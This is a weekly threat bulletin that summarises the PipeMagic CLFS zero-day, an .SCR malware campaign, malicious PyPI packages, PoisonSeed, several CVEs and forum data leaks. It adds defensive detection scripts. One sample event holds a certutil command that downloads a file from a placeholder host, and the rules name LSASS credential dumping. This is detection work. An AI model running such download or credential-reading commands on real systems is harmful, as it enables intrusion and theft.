Introduction
The weekly Cybersecurity Bulletin report has been prepared by the ECHO team to summarize and inform about cybersecurity incidents that have occurred in recent weeks.
Executive Summary
This bulletin:
- Provides up-to-date information on cyber threats such as attacks, data leaks, malware, ransomware, and critical vulnerabilities.
- Is prepared weekly by our security team, which analyzes these threats so that potential risks can be minimized.
Security News
Malware of the Week: Exploiting Windows CLFS Zero-Day Vulnerability with PipeMagic Trojan
Description
Microsoft has patched CVE-2025-29824, a critical local privilege escalation vulnerability in the Windows Common Log File System (CLFS) component that is being actively exploited. The threat actor Storm-2460 exploited it through a modular malware called PipeMagic to deploy ransomware on compromised systems.
These attacks targeted the information technology and real estate sectors in the US, the financial sector in Venezuela, a software company in Spain, and the retail sector in Saudi Arabia.
Detected CVE
- CVE ID: CVE-2025-29824
- Vulnerability Type: Local Privilege Escalation
- Location of Vulnerability: clfs.sys (CLFS kernel driver)
- Impact: Gaining SYSTEM privileges, installing malware, and ransomware encryption
- CVSS Score: 7.8 (considered critical)
Technical Details
Attack Chain
- Initial Access: Although the exact vector is not clearly known, the malware is downloaded from a legitimate site using the certutil tool.
- Malicious File: An encrypted payload is placed inside an MSBuild script.
- PipeMagic Infection: MSBuild.exe decrypts the encrypted content and runs the modular trojan named PipeMagic in memory.
- CLFS Exploitation: PipeMagic uses the RtlSetAllBits API to set the transaction token to 0xFFFFFFFF and gains SYSTEM-level privileges.
- LSASS Memory Dump: lsass.exe memory is dumped, and session data and credentials are captured.
- Ransomware Stage: Files are encrypted with random extensions and a RansomEXX note is left on the system.
Impact of Vulnerability or Malware
- Executing commands with SYSTEM rights
- Stolen user information and session data
- Encryption with ransomware and demanding payment via TOR
- Service interruption, data loss and financial loss
Code & API Functions
- RtlSetAllBits
- NtQuerySystemInformation
- Access via SeDebugPrivilege
- Loading payload via MSBuild.exe
- Downloading malicious files via certutil.exe
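The attack chain above leaves three host-level traces a defender can key on: certutil used as a downloader, MSBuild.exe started outside normal build tooling, and a non-security process opening lsass.exe. The following is an added example (it is not part of the bulletin and not code from Microsoft or any vendor) that runs those three rules over constructed process events; the simplified event schema, the parent allowlist for MSBuild and the allowlist of processes expected to read LSASS are assumptions to be tuned for your environment.

```python
"""Constructed process-event triage for the PipeMagic / CVE-2025-29824 chain:
certutil download, MSBuild in-memory loader, LSASS memory access.
Added example; the event format is a hypothetical simplified EDR export."""
import re
from dataclasses import dataclass
from typing import Dict, List

@dataclass
class Event:
    kind: str            # "process_create" or "process_access"
    image: str           # process performing the action
    parent: str = ""     # parent image (process_create only)
    cmdline: str = ""    # command line (process_create only)
    target: str = ""     # target image (process_access only)

# Assumption: legitimate parents of MSBuild.exe (developer tooling, CI agents)
MSBUILD_OK_PARENTS = {"devenv.exe", "dotnet.exe", "vstest.console.exe"}
# Assumption: processes expected to open lsass.exe (OS components, AV/EDR agents)
LSASS_OK_READERS = {"csrss.exe", "wininit.exe", "services.exe", "msmpeng.exe"}

def base(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()

def check_event(ev: Event) -> List[str]:
    """Return the detection labels an event triggers (empty list if benign)."""
    hits = []
    img = base(ev.image)
    if ev.kind == "process_create":
        cmd = ev.cmdline.lower()
        # certutil abused as a downloader ("Downloading malicious files via certutil.exe")
        if img == "certutil.exe" and ("-urlcache" in cmd or re.search(r"https?://", cmd)):
            hits.append("certutil_download")
        # MSBuild launched by something other than build tooling ("Loading payload via MSBuild.exe")
        if img == "msbuild.exe" and base(ev.parent) not in MSBUILD_OK_PARENTS:
            hits.append("msbuild_suspicious_parent")
    elif ev.kind == "process_access":
        # a non-allowlisted process opening lsass memory ("LSASS Memory Dump")
        if base(ev.target) == "lsass.exe" and img not in LSASS_OK_READERS:
            hits.append("lsass_access")
    return hits

def triage(events: List[Event]) -> Dict[str, List[str]]:
    """Map each detection label to the image names that triggered it."""
    out: Dict[str, List[str]] = {}
    for ev in events:
        for label in check_event(ev):
            out.setdefault(label, []).append(base(ev.image))
    return out

# Constructed sample events (not real telemetry)
SAMPLE_EVENTS = [
    Event("process_create", r"C:\Windows\System32\certutil.exe", "cmd.exe",
          r"certutil -urlcache -split -f http://example.invalid/update.bin C:\Users\Public\u.bin"),
    Event("process_create", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
          "cmd.exe", r"MSBuild.exe C:\Users\Public\build.xml"),
    Event("process_create", r"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\MSBuild.exe",
          "devenv.exe", r"MSBuild.exe C:\src\app\app.csproj"),   # benign developer build
    Event("process_access", r"C:\Users\Public\u.exe", target=r"C:\Windows\System32\lsass.exe"),
    Event("process_access", r"C:\ProgramData\Microsoft\Windows Defender\MsMpEng.exe",
          target=r"C:\Windows\System32\lsass.exe"),              # benign AV access
]

if __name__ == "__main__":
    for label, images in triage(SAMPLE_EVENTS).items():
        print(f"{label}: {images}")
```

The two benign events (MSBuild under devenv.exe, Defender reading LSASS) are included deliberately: without the parent and reader allowlists these rules would be too noisy to act on, so those allowlists are the part to adapt first.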
Another Malware of the Week: Threat Actors Use Windows Screen Saver Files as Malware Delivery Vehicle
Description
In the latest wave of attacks, threat actors are using the Windows .SCR screen saver file extension to deliver malware. In this campaign, actors posing as international transportation companies use phishing emails to trick target users into running malicious payloads disguised as screen savers.
Technical Details
- Email Theme: Emails themed as coming from an international logistics company, with subject lines written in Chinese announcing shipping notifications.
- Malicious Payload: The ZIP file contains a malicious file with a .scr extension.
- Loader: ModiLoader – Delphi-based malware loader.
- Distributed Malware:
- Remcos
- Agent Tesla
- MassLogger
- AsyncRAT
- Formbook
Targeted Industries and Countries
- Industries: Automotive, publishing, electronics, aviation, manufacturing, cleaning products, entertainment industry
- Countries: Turkey, Japan, UK, Sweden, USA, Hong Kong, Taiwan, Thailand, Malaysia
Impact of Vulnerability or Malware
- When a user runs the screensaver file, the malware is activated in the background.
- The malware provides persistent access to corporate systems, data exfiltration and remote control.
- Malicious files are usually hidden in email attachments as RAR/ZIP archives.
Detected Methods and Detection Codes
- Symantec detection names:
- Trojan.Gen.MBT
- Scr.Malcode!gen19
- Machine learning model:
- Heur.AdvML.B
- Email filtering & sandbox recommendation:
- Email Threat Isolation (ETI)
- VMware Carbon Black policies: Blocking against PUP and suspicious behavior
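A .scr file is a Windows executable with a different extension, so an attachment scanner that only looks for .exe misses this campaign. The following is an added example (not part of the bulletin, and not Symantec or VMware code) that inspects a constructed ZIP attachment in memory, flags members with executable or double extensions, and descends into nested archives; the extension list and the recursion limit are assumptions.

```python
"""Attachment archive triage for the .SCR screen-saver campaign.
Added example: builds a constructed ZIP in memory and reports members whose
effective extension is executable, descending into nested ZIP files."""
import io
import zipfile
from typing import List, Optional, Tuple

# Assumption: extensions Windows executes on open (.scr is a PE image like .exe)
EXEC_EXTS = {".scr", ".exe", ".pif", ".com", ".bat", ".cmd", ".js", ".vbs", ".lnk", ".hta"}
MAX_DEPTH = 3  # assumption: stop descending into archives nested deeper than this

def classify_name(name: str) -> Optional[str]:
    """Reason string if the member name looks dangerous, else None."""
    lower = name.rsplit("/", 1)[-1].lower()
    parts = lower.split(".")
    if len(parts) < 2:
        return None
    last = "." + parts[-1]
    if last in EXEC_EXTS:
        # e.g. "shipping_notice.pdf.scr": a benign-looking inner extension hides the real one
        if len(parts) > 2:
            return f"double extension ending in {last}"
        return f"executable extension {last}"
    return None

def scan_zip(data: bytes, depth: int = 0, prefix: str = "") -> List[Tuple[str, str]]:
    """(member path, reason) pairs for suspicious members, recursing into nested ZIPs."""
    findings: List[Tuple[str, str]] = []
    with zipfile.ZipFile(io.BytesIO(data)) as zf:
        for info in zf.infolist():
            path = prefix + info.filename
            reason = classify_name(info.filename)
            if reason:
                findings.append((path, reason))
            if info.filename.lower().endswith(".zip") and depth < MAX_DEPTH:
                inner = zf.read(info)
                if zipfile.is_zipfile(io.BytesIO(inner)):
                    findings.extend(scan_zip(inner, depth + 1, path + "!/"))
    return findings

def build_sample_zip() -> bytes:
    """Constructed attachment imitating the campaign; the payloads are placeholder bytes, not PEs."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as z:
        z.writestr("tracking.scr", b"MZ-placeholder")
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as z:
        z.writestr("shipping_notice.pdf.scr", b"MZ-placeholder")
        z.writestr("invoice.pdf", b"%PDF-placeholder")
        z.writestr("docs/archive.zip", inner.getvalue())
    return outer.getvalue()

if __name__ == "__main__":
    for path, reason in scan_zip(build_sample_zip()):
        print(f"{path}: {reason}")
```

The scan reads member names only; a complete gateway check would also examine the file header (an "MZ" signature inside a .pdf is as suspicious as a .scr name), since renaming is the cheapest evasion.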
Malicious Python Library of the Week: Malicious Python Packages Detected on PyPI: Data Theft with Over 39,000 Downloads
Description
Malicious packages designed to steal users’ database files, credit card information, and other sensitive data have been detected via the Python Package Index (PyPI). These packages include fake “bitcoinlib” fixes and tools that perform card verification on WooCommerce. With over 39,000 downloads in total, they pose a serious threat.
Malicious Packages Detected
| Package Name | Download Count | Malicious Purpose |
|---|---|---|
| bitcoinlibdbfix | 1,101 | Data export by modifying the clw CLI command |
| bitcoinlib-dev | 735 | Fake fix package, data leak |
| disgrasya | 37,217 | Card verification and information leak on WooCommerce |
Technical Details
bitcoinlibdbfix and bitcoinlib-dev
- Presented as fake fixes to the real bitcoinlib module.
- Stole database files from user systems by overwriting the clw command.
- The developers participated in discussions on GitHub and promoted these packages as a legitimate fix.
disgrasya
- Targets WooCommerce stores and systems using the CyberSource payment gateway.
- The script automatically performs the following actions:
- Searches for a product
- Adds it to the cart
- Enters stolen card information in the checkout form
- Performs card verification by mimicking real user behavior.
- Stolen card information is sent to the railgunmisaka[.]com server.
Impact
- Database information leak: Passwords, configurations, custom files.
- Credit card information verification: Testing the validity of cards and making them sellable.
- Integration with automation systems: Facilitating wider attacks.
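Both bitcoinlib packages worked because a "fix" named after a trusted library looks plausible in a requirements file. The following is an added example (not part of the bulletin, and not PyPI or bitcoinlib code) that audits a constructed requirements.txt: it flags the three package names reported above, names formed from a trusted package plus a "fix"/"dev" style suffix, and close misspellings of a trusted name. The trusted-package list, the suffix list and the similarity threshold are assumptions.

```python
"""Dependency-name triage for the PyPI campaign described above.
Added example; the denylist holds the three names the bulletin reports,
the trusted list and the sample requirements are constructed."""
import difflib
import re
from typing import Dict, List, Tuple

REPORTED_MALICIOUS = {"bitcoinlibdbfix", "bitcoinlib-dev", "disgrasya"}  # from the bulletin
TRUSTED = {"bitcoinlib", "requests", "woocommerce"}   # assumption: your project's vetted dependencies
SUSPICIOUS_SUFFIXES = {"dev", "fix", "dbfix", "patch"}  # assumption: "fix" style suffixes
TYPO_THRESHOLD = 0.85                                    # assumption: similarity ratio

def normalize(name: str) -> str:
    """PEP 503 normalization: case-fold and collapse runs of '-', '_' and '.' into '-'."""
    return re.sub(r"[-_.]+", "-", name).lower()

def parse_requirements(text: str) -> List[str]:
    """Package names from requirements.txt-style lines (ignores versions, comments, options)."""
    names = []
    for line in text.splitlines():
        line = line.split("#", 1)[0].strip()
        if not line or line.startswith("-"):
            continue
        m = re.match(r"([A-Za-z0-9][A-Za-z0-9._-]*)", line)
        if m:
            names.append(m.group(1))
    return names

def classify(name: str) -> Tuple[str, str]:
    """(verdict, related trusted name). Verdicts: reported_malicious, trusted,
    lookalike_suffix, lookalike_typo, unknown."""
    n = normalize(name)
    if n in {normalize(x) for x in REPORTED_MALICIOUS}:
        return ("reported_malicious", "")
    if n in {normalize(x) for x in TRUSTED}:
        return ("trusted", n)
    for trusted in sorted(TRUSTED):
        tn = normalize(trusted)
        # trusted name plus a "fix"/"dev" suffix, the pattern of bitcoinlibdbfix / bitcoinlib-dev
        if n.startswith(tn) and n[len(tn):].lstrip("-") in SUSPICIOUS_SUFFIXES:
            return ("lookalike_suffix", tn)
        # close misspelling of a trusted name
        if difflib.SequenceMatcher(None, n, tn).ratio() >= TYPO_THRESHOLD:
            return ("lookalike_typo", tn)
    return ("unknown", "")

def audit(requirements_text: str) -> Dict[str, Tuple[str, str]]:
    """Verdict for every package named in the requirements text."""
    return {name: classify(name) for name in parse_requirements(requirements_text)}

# Constructed requirements file (the suffix and typo names are made up for the example)
SAMPLE_REQUIREMENTS = """\
requests==2.32.0
bitcoinlib-fix      # pasted from a GitHub issue thread
bitcoinlibdbfix>=0.1
disgrasya
bitcoinlb
numpy
"""

if __name__ == "__main__":
    for pkg, (verdict, related) in audit(SAMPLE_REQUIREMENTS).items():
        print(f"{pkg:18} {verdict:20} {related}")
```

"unknown" is not a clean bill of health; it only means the name matches neither list, which is where a package allowlist or a review of the publisher and release history takes over.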
Campaign of the Week: PoisonSeed Campaign: Crypto Wallet Poisoning Attacks via CRM Accounts
Description
The malicious campaign called “PoisonSeed” uses compromised CRM and bulk email service provider accounts to perform crypto wallet “seed phrase poisoning” attacks. The goal is to trick victims into creating wallets with attacker-supplied recovery phrases (seed phrases), so that the funds they deposit are lost to the attackers.
Targeted Platforms
- CRM and email services: Mailchimp, SendGrid, Hubspot, Mailgun, Zoho
- Crypto platforms: Coinbase, Ledger
- Target audience: Enterprise companies and individual users
Technical Details
1. Phishing Pages
- Attackers create fake login screens for CRM providers.
- Once credentials are compromised, an API key is created to maintain persistent access.
2. Spreading via Spam
- Email lists are exported from compromised accounts using automated tools.
- Victims are told to set up Coinbase Wallet and use the specified seed phrase.
- The supplied seed phrase corresponds to wallets controlled by the attackers.
3. Domains and Infrastructure Used
- Example fake domain name: mailchimp-sso[.]com
- Fake pages hosted on Cloudflare Pages.Dev and Workers.Dev
- Double-extension .LNK files delivered over the ms-search protocol
- Remote control using the Pyramid C2 framework
- Victim IP information is transmitted to the attacker via a Telegram bot
Impact
- Financial Losses: Assets in crypto wallets are stolen.
- Persistent Access: Attackers can retain access through the API key they created.
- Reputation Damage: CRM services can become a source of spam.
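The phishing domains in this campaign carry a brand name (mailchimp-sso[.]com) without being the brand's registered domain. The following is an added example (not part of the bulletin, and not code from any of the providers named) that pulls links out of a constructed email, refangs defanged indicators, and reports a link when a brand label appears in the hostname but the registrable domain is not one of that brand's genuine domains. The brand-to-domain map is an assumption, and registrable domains are approximated as the last two labels; a production version would use the Public Suffix List.

```python
"""Brand-lookalike hostname check for PoisonSeed-style phishing links.
Added example; the BRAND_DOMAINS map is an assumption kept deliberately short."""
import re
from typing import Dict, List, Optional
from urllib.parse import urlsplit

# Assumption: the brands the bulletin names, mapped to their genuine registrable domains
BRAND_DOMAINS: Dict[str, List[str]] = {
    "mailchimp": ["mailchimp.com"],
    "sendgrid": ["sendgrid.com"],
    "hubspot": ["hubspot.com"],
    "mailgun": ["mailgun.com"],
    "zoho": ["zoho.com"],
    "coinbase": ["coinbase.com"],
    "ledger": ["ledger.com"],
}

LINK_RE = re.compile(r"(?:hxxps?|https?)://[^\s<>'\"]+")

def refang(text: str) -> str:
    """Restore defanged indicators: 'mailchimp-sso[.]com', 'hxxps://'."""
    return (text.replace("[.]", ".")
                .replace("hxxps://", "https://")
                .replace("hxxp://", "http://"))

def hostname_of(url_or_host: str) -> str:
    s = refang(url_or_host).strip().lower()
    if "://" not in s:
        s = "http://" + s
    return (urlsplit(s).hostname or "").rstrip(".")

def registrable(host: str) -> str:
    """Approximation: last two labels (assumption; use the Public Suffix List in production)."""
    labels = host.split(".")
    return ".".join(labels[-2:]) if len(labels) >= 2 else host

def check_host(url_or_host: str) -> Optional[str]:
    """The impersonated brand if a brand label appears in the host but the registrable
    domain is not that brand's, else None."""
    host = hostname_of(url_or_host)
    reg = registrable(host)
    tokens = set(re.split(r"[.-]", host))   # "mailchimp-sso.com" -> {mailchimp, sso, com}
    for brand, legit in BRAND_DOMAINS.items():
        if brand in tokens and reg not in legit:
            return brand
    return None

def extract_links(text: str) -> List[str]:
    return LINK_RE.findall(text)

def audit_links(email_text: str) -> Dict[str, Optional[str]]:
    """Each link in the message mapped to the brand it impersonates (None if no finding)."""
    return {link: check_host(link) for link in extract_links(email_text)}

# Constructed phishing message in the style the bulletin describes (not a real sample)
SAMPLE_EMAIL = """\
Action required: your Coinbase Wallet needs to be set up today.
Sign in at hxxps://mailchimp-sso[.]com/login to confirm your account,
or restore your wallet: https://coinbase-wallet-setup.pages.dev/start
Questions? Visit https://www.coinbase.com/help
"""

if __name__ == "__main__":
    for link, brand in audit_links(SAMPLE_EMAIL).items():
        print(f"{link} -> {brand or 'ok'}")
```

Token matching catches hyphenated and subdomain abuse (mailchimp-sso, sso.mailchimp.com.evil.example) but not misspellings such as a doubled letter; a similarity check against the brand list would cover that case.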
Featured Vulnerabilities of the Week
Critical Unauthorized Password Change Vulnerability in FortiSwitch Products (CVE-2024-48887)
Description
Fortinet has released security updates for a critical vulnerability discovered in FortiSwitch products that could allow remote unauthenticated attackers to change administrator passwords.
Detected CVE
- CVE ID: CVE-2024-48887
- Risk Score: 9.3 (out of 10)
- Description: FortiSwitch GUI unauthenticated password change vulnerability (CWE-620)
- Impact: Remote unauthenticated attackers can change administrator passwords via a specially crafted request.
Technical Detail
This vulnerability in the FortiSwitch web-based management interface (GUI) allows unauthenticated attackers to change administrator passwords via specially crafted HTTP requests. This makes the system vulnerable to unauthorized access.
Sample Request:
Impact of Vulnerability
If this vulnerability is successfully exploited, attackers can change the passwords of administrator accounts and gain full control over the system. This leads to a serious compromise of network security.
Codes / Functions of the Vulnerability
- Fortinet has not shared detailed information about the specific codes and functions of the vulnerability.
- It is evaluated in the CWE-620 (Unverified Password Change) class.
- The vulnerability was discovered by Daniel Rozeboom from the FortiSwitch web UI development team.
Microsoft Fixes 125 Vulnerabilities, Including Actively Exploited Zero-Day Vulnerability in Windows CLFS Component
Description
Microsoft released updates that fix a total of 125 security vulnerabilities in the Windows operating system as part of the April 2025 “Patch Tuesday”. These patches include CVE-2025-29824, a zero-day vulnerability that is currently being actively exploited by attackers. The vulnerability is located in the Common Log File System (CLFS) component of Windows and can lead to SYSTEM-level privilege gain.
Critical CVE Identified
- CVE ID: CVE-2025-29824
- Vulnerability Type: Use-After-Free
- Affected Component: Windows CLFS
- Privilege Level: Transition from low-privileged user to SYSTEM privileges
- CVSS Score: 7.8 / 10
- Exploitation Status: Actively exploited in the wild
- Attributed Threat Actor: Storm-2460
- Associated Malware: PipeMagic loader (associated with ransomware campaigns)
Technical Details
The vulnerability is caused by a use-after-free memory management error that allows a local low-privileged user to gain SYSTEM privileges by executing a specially crafted exploit. This vulnerability, which does not require user interaction, is being used by ransomware actors in targeted attacks.
Microsoft stated that it plans to develop HMAC (Hash-based Message Authentication Code) integration and new mitigation mechanisms in the future against such issues in the CLFS component.
Impact of the Vulnerability
- A low-privileged user can escalate privileges and gain control at the SYSTEM level.
- Ransomware and other malware can be loaded into the system.
- Critical system components are targeted, making data leakage, damage or intra-network spread possible.
- The vulnerability has been reported to affect sectors (IT, software, real estate, retail) in Venezuela, Spain, the USA and Saudi Arabia.
Extra Critical Patches
- Another Use-After-Free vulnerability (Remote Code Execution) in the Hyper-V component
- RCE vulnerabilities for Windows RDP (Remote Desktop Services)
- Remotely exploitable RCE vulnerabilities in Microsoft Office and Excel
CVE-2025-30401 – Critical Spoofing Vulnerability in WhatsApp for Windows Allows Possible Code Execution
Description
This vulnerability, identified as CVE-2025-30401, is caused by an inconsistency between the MIME type and file extension in the Windows version of WhatsApp, which can allow users to unknowingly run malicious software (e.g. trojan, ransomware, spyware) by opening seemingly harmless attachments.
Detected CVE
- CVE ID: CVE-2025-30401
- Vulnerability Type: Spoofing
- Impact: Remote Code Execution
- Affected Versions: 0.0.0 – 2.2450.5
- Secure Version: 2.2450.6 and above
- Danger Level: Critical
- Vulnerability Description: Because the MIME type and the file extension are not checked against each other, malicious files with executable extensions such as .jpg.exe are shown as “images” but execute code when opened.
Technical Details
Configuration Example
- MIME Type: image/jpeg
- File Extension: file.jpg.exe
- User Perception: Visual content (.jpg)
- Actual Behavior: Executable file runs
Windows acts only on the file extension, without considering the file's MIME type. Therefore, files like .jpg.exe are shown as harmless but execute malicious code when opened.
Impact of Vulnerability
- Code Execution: Malware, RATs, and ransomware can be launched automatically.
- Social Engineering Attacks: Users are tricked through a chat platform they trust.
- Large-Scale Impact: Businesses, public institutions, and individual users can be targeted.
Codes / Functions of the Vulnerability
- MIME and Extension Mismatch: MIME: image/jpeg, Extension: .jpg.exe
- File Triggering Mechanism:
- WhatsApp displays the file according to the MIME type
- Windows runs it according to the file extension
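The defensive inverse of this bug is to decide what an attachment is from the extension the operating system will act on, never from the declared MIME type. The following is an added example (not part of the bulletin and not WhatsApp code) that classifies constructed attachments as executable, MIME-mismatched or consistent, and derives the label a hardened client should show; the executable-extension list is an assumption.

```python
"""Declared-MIME versus effective-extension check for the CVE-2025-30401 pattern.
Added example; EXEC_EXTS is a representative list, not an exhaustive one."""
import mimetypes
from typing import Dict, List, Tuple

# Assumption: extensions Windows hands to the loader or a script host when opened
EXEC_EXTS = {".exe", ".scr", ".com", ".pif", ".bat", ".cmd", ".js", ".vbs", ".hta", ".msi"}

def effective_extension(filename: str) -> str:
    """The extension the OS actually acts on: the last one ('.exe' for 'file.jpg.exe')."""
    name = filename.replace("\\", "/").rsplit("/", 1)[-1].lower()
    return "." + name.rsplit(".", 1)[-1] if "." in name else ""

def check_attachment(declared_mime: str, filename: str) -> str:
    """'executable' if the OS would run it, 'mime_mismatch' if the effective extension
    does not agree with the declared type, otherwise 'consistent'."""
    ext = effective_extension(filename)
    if ext in EXEC_EXTS:
        return "executable"            # runs regardless of what the MIME header claims
    guessed, _ = mimetypes.guess_type("x" + ext)
    if guessed is None or guessed.lower() != declared_mime.lower():
        return "mime_mismatch"
    return "consistent"

def display_label(declared_mime: str, filename: str) -> str:
    """What a hardened client should show: derived from the effective type, never from
    the declared MIME alone."""
    verdict = check_attachment(declared_mime, filename)
    ext = effective_extension(filename) or "no extension"
    if verdict == "executable":
        return f"Executable file ({ext}) - blocked"
    if verdict == "mime_mismatch":
        return f"File type unverified ({ext})"
    return declared_mime

def triage(items: List[Tuple[str, str]]) -> Dict[str, str]:
    """Verdict per filename for (declared MIME, filename) pairs."""
    return {filename: check_attachment(mime, filename) for mime, filename in items}

# Constructed attachments: the second one is the .jpg.exe case from the bulletin
SAMPLE_ATTACHMENTS = [
    ("image/jpeg", "holiday.jpg"),
    ("image/jpeg", "holiday.jpg.exe"),
    ("application/pdf", "invoice.pdf"),
    ("image/png", "scan.pdf"),
]

if __name__ == "__main__":
    for mime, name in SAMPLE_ATTACHMENTS:
        print(f"{name:18} {check_attachment(mime, name):14} shown as: {display_label(mime, name)}")
```

mimetypes.guess_type only consults extension tables, so "consistent" means the two declared signals agree, not that the content is what it claims; sniffing the file header is the next layer.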
11 Critical Vulnerabilities in Adobe ColdFusion Products
Description
Adobe has released security updates to address a total of 30 security vulnerabilities in its various products, including ColdFusion versions 2025, 2023 and 2021. 11 of these vulnerabilities are critical and can cause serious effects on the system, such as unauthorized file reading, remote code execution (RCE) and security feature bypass.
Detected CVEs (Critical)
- CVE-2025-24446 – Arbitrary read on file system (CVSS: 9.1)
- CVE-2025-24447 – RCE via insecure data serialization (CVSS: 9.1)
- CVE-2025-30281 – Insufficient access control (CVSS: 9.1)
- CVE-2025-30282 – RCE via insufficient validation mechanism (CVSS: 9.1)
- CVE-2025-30284/85 – Serialization vulnerabilities (CVSS: 8.0)
- CVE-2025-30286/89 – Remote command injection execution (CVSS: 8.0 – 7.5)
- CVE-2025-30287 – RCE with unauthorized validation (CVSS: 8.1)
- CVE-2025-30288 – Security feature bypass (CVSS: 7.8)
- CVE-2025-30290 – Bypass of system protection mechanisms with path traversal (CVSS: 8.7)
Technical Details
- Types of Vulnerabilities: Serialization, lack of access control, command injection, authentication deficiencies
- Potential Exploitation: Attackers can create malicious objects on the target system, particularly by exploiting serialization vulnerabilities. These objects can gain unauthorized access to the file system or cause arbitrary commands to be executed.
Impact of Vulnerabilities
- File System Violations: Unauthorized access to critical system files can be gained.
- Remote Code Execution (RCE): Malicious commands can be injected into the system.
- Security Feature Bypass: System protection can be bypassed by disabling authentication mechanisms.
Related Code / Modules
- Serialization functions: readObject, ObjectInputStream
- Command Injection Entry Points: Direct execution of user input with commands such as Runtime.exec
- Authentication Bypass Points: Insufficiently validated REST API endpoints, admin interfaces
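The serialization entry point above is dangerous because a deserializer resolves whatever class the incoming bytes name before the application sees the object. The standard hardening is a look-ahead allowlist applied at class-resolution time (Java's ObjectInputFilter for ObjectInputStream), and, where possible, a data-only format instead. The following is an added example in Python (not Adobe's code; Python's pickle is the analogue of Java serialization here) showing both: a restricted unpickler that refuses any class outside an allowlist, and a JSON parser that validates fields explicitly. The Order record and its allowlist are assumptions.

```python
"""Allowlisted deserialization, the Python analogue of filtering ObjectInputStream.readObject.
Added example; 'Order' stands in for an application's own record type."""
import io
import json
import pickle
from dataclasses import dataclass
from typing import Any

@dataclass
class Order:
    sku: str
    qty: int

# Assumption: the only classes untrusted bytes may reconstruct
ALLOWED_CLASSES = {(Order.__module__, "Order")}

class RestrictedUnpickler(pickle.Unpickler):
    """Look-ahead filter: every class reference is checked before an instance is built."""
    def find_class(self, module: str, name: str) -> Any:
        if (module, name) in ALLOWED_CLASSES:
            return super().find_class(module, name)
        raise pickle.UnpicklingError(f"refused to resolve {module}.{name} from untrusted data")

def safe_loads(data: bytes) -> Any:
    """Deserialize untrusted bytes through the allowlist."""
    return RestrictedUnpickler(io.BytesIO(data)).load()

def order_from_json(text: str) -> Order:
    """Data-only alternative: parse a plain document and validate shape and types explicitly."""
    doc = json.loads(text)
    if not isinstance(doc, dict) or set(doc) != {"sku", "qty"}:
        raise ValueError("unexpected document shape")
    if not isinstance(doc["sku"], str) or not isinstance(doc["qty"], int) or doc["qty"] <= 0:
        raise ValueError("invalid field types or values")
    return Order(doc["sku"], doc["qty"])

def roundtrip_order(sku: str, qty: int) -> Order:
    """An allowlisted type survives the restricted load unchanged."""
    return safe_loads(pickle.dumps(Order(sku, qty)))

def rejects(obj: Any) -> bool:
    """True if a pickle of obj names a class outside the allowlist and is refused."""
    try:
        safe_loads(pickle.dumps(obj))
    except pickle.UnpicklingError:
        return True
    return False

if __name__ == "__main__":
    print(roundtrip_order("A1", 3))
    print("plain object rejected:", rejects(object()))     # builtins.object is not allowlisted
    print("builtin function rejected:", rejects(len))       # neither is builtins.len
    print(order_from_json('{"sku": "A1", "qty": 3}'))
```

The filter runs before any constructor or reduce callable executes, which is the property that matters: a deserializer that checks the type after building the object has already run attacker-chosen code.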
Critical CVE Detail Examples
CVE-2025-24446
- CVSS Score: 9.1
- Description: This vulnerability, caused by improper input validation, allows attackers to read arbitrary files.
- Impact: Unauthorized access to the file system may be possible.
CVE-2025-24447
- CVSS Score: 9.1
- Description: A serialization vulnerability in untrusted data allows attackers to execute arbitrary code.
- Impact: Unauthorized commands may be executed on the system.
CVE-2025-30281
- CVSS Score: 9.1
- Description: Unauthorized access to the file system may be gained through access control deficiencies.
- Impact: Unauthorized data viewing and exfiltration.
CVE-2025-30282
- CVSS Score: 9.1
- Description: A vulnerability in the authentication mechanism allows attackers to perform RCE.
- Impact: Control of the system may be taken.
What’s Happening in the Hacker Forum World
hibu.com DATA BREACH – Database, Leaked!
- Date: April 10, 2025
- Threat Actor: Meow
- Forum: BreachForums
- Share:
In March 2025, it was announced that there was a major data breach against the hibu.com platform, which offers digital marketing and local business solutions. It is stated that in this breach, data belonging to approximately 68,000 companies was leaked and shared by the attackers.
Breach Details:
- Data Types: Full Name, Email Address, Phone Number, Commenter Information
- Total Number of Registrations: 68,000 companies
- Publication Format: Offered as hidden content for “8 credits” via BreachForums.
- Payment Methods: Credit system (no details provided)
According to the attacker’s sharing, the leaked data includes users’ personal and corporate contact information, and this data can be misused for various purposes. It is strongly recommended that users and companies check whether they are affected by this data leak and take basic security measures such as changing their passwords.
Zain Telecom DATA BREACH – Database, Leaked!
- Date: June 16, 2023
- Threat Actor: FazyMalone
- Forum: BreachForums
- Share:
Zain Telecom, one of Iraq’s leading telecommunications companies, came to the fore with a large-scale data breach that was reported to have occurred between 2019 and 2021. The breach revealed that over 11 million user records were leaked and that this data was openly shared.
Breach Details:
- Data Types: Full Name, City, Address, Phone Number, ID Number
- Years: 2019 – 2021
- Total Number of Records: Over 11 million
- Sample Data: The forum post includes sample records containing ID number, phone, full address and personal information.
Sharing the data directly and presenting the examples openly on the forum increases the seriousness of the incident. This situation may pose serious privacy and security threats to individuals and institutions in Iraq. Users are advised to increase their awareness of risks such as identity theft and fraud and re-evaluate their security measures.
CNSS (National Social Security Fund of Morocco) DATA BREACH – FULL DATABASE LEAKED 2025
- Date: April 8, 2025
- Threat Actor: Jabaroot
- Forum: BreachForums
- Share:
The CNSS, the public social security institution of Morocco (Caisse Nationale de Sécurité Sociale) faced a major data breach in April 2025. The institution was founded in 1959 and was transferred from the Ministry of Labor to the Ministry of Finance in 2021. The CNSS carries out the social security processes of more than 400,000 companies and approximately 3.9 million employees.
Breach Details:
- Data Types:
- 499,881 registered company information (CSV files) containing company data
- 53,574 PDF files with salary information of company employees
- 1,996,026 employee personal data (in detailed CSV format)
Company Data Fields (CSV): companyName, affiliateNumber, admin_email, admin_phoneNumber, bank_accountId, bank_accountRIB, bank_adherent_raisonSocial, bank_accountState, bank_accountDefaultState, bank_dateCreation, etc.
Employee Data Fields (CSV): ID_adherent, firstName, lastName, immatriculationNumber, cin, passportNumber, residenceNumber, creationDate, affiliateName, affiliateNumber, demandState, etc.
This leak clearly reveals the financial and personal information of not only individuals but also corporate structures. It also brings risks such as data breach, identity theft, fraud and social engineering attacks. It is strongly recommended that individuals and institutions registered in the CNSS system perform the necessary security checks.